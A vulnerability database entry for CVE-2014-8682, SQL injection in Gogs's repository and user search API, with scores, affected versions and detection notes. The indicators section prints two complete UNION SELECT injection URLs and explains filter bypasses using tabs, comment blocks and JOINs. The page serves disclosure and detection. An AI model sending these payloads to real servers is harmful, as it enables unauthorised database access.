cbcvebase.
CVE-2014-8682
published 2014-11-21

CVE-2014-8682: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary…

PriorityP263high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
34.27%
98.2th percentile
Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.

Affected

7 ranges
VendorProductVersion rangeFixed in
gogitsgogs<= 0.5.5
gogitsgogs
gogitsgogs
gogitsgogs
gogitsgogs
gogitsgogs
gogs.iogogs>= 0.3.1 < 0.5.80.5.8

Detection & IOCsextracted from sources · hover to see the quote

url/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
url/api/v1/users/search?q='/**/and/**/false)/**/union/**/select/**/null,null,@@version,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/mysql.db/**/where/**/('%25'%3D'
path/api/v1/repos/search
path/api/v1/users/search
  • Successful exploitation of the /api/v1/repos/search endpoint returns a JSON response body containing all three of the strings '"ok":true', '"data"', and '"repolink":"' simultaneously with HTTP 200.
  • The SQL injection payload uses tab characters (0x09 / %09) as whitespace substitutes instead of spaces (0x20), because the FilterSQLInject function strips spaces. Detection rules should look for tab-delimited UNION SELECT patterns in the q parameter.
  • The /api/v1/users/search PoC uses /**/ comment blocks as whitespace substitutes in the q parameter to bypass the space filter; monitor for comment-delimited UNION SELECT patterns in requests to this endpoint.
  • ·The SQL injection is only exploitable on Gogs versions >= v0.3.1-9-g49dc57e through 0.5.x before 0.5.6.1105 Beta; versions from 0.5.6.1105 onward use prepared statements and are not vulnerable.
  • ·Starting from v0.5.6.1025-g83283b, commas are also filtered by FilterSQLInject in addition to spaces, requiring attackers to use JOIN-based UNION payloads instead of comma-separated column lists.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.